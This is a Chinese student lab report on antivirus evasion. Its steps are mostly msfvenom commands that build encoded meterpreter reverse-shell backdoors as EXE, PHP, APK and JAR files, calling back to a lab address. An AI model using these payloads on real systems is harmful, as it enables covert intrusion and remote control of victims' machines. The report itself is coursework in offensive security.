一、实验内容:
- 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件
- msfvenom生成php文件
- msfvenom生成apk文件
- msfvenom生成jar文件
- veil
- 使用C + shellcode编程
- 加壳工具(压缩壳、加密壳)
- 2.通过组合应用各种技术实现恶意代码免杀
- 免杀实践1
- 免杀实践2
- 免杀实践3(强一些)
- 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
- 对免杀实践1做出的exe进行测试
- 对免杀实践3做出的exe进行测试
二、实验要求:
- 1.报告格式范围,版面整洁 加0.5
- 2.报告排版混乱,加0分。
- 3.报告逻辑混乱表述不清或文字有明显抄袭可能 -1
三、实验步骤:
一、正确使用msf编码器
1.使用msfvenom -l encoders
查看可以使用的编码器来生成不同的后门
msfvenom -l encoders
2.对实验二生成的20181328_backdoor.exe后门程序用VirusTotal进行扫描,结果如下图所示:
一次编码:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded.exe
十次编码:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.19.136 LPORT=1328 -f exe > csq-encoded10.exe
3.msfvenom生成php文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.php
4.msfvenom生成apk文件
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.19.136 lport=1328 x> zwq_backdoor.apk
5.msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.136 LPORT=1328 x> zwq_backdoor_java.jar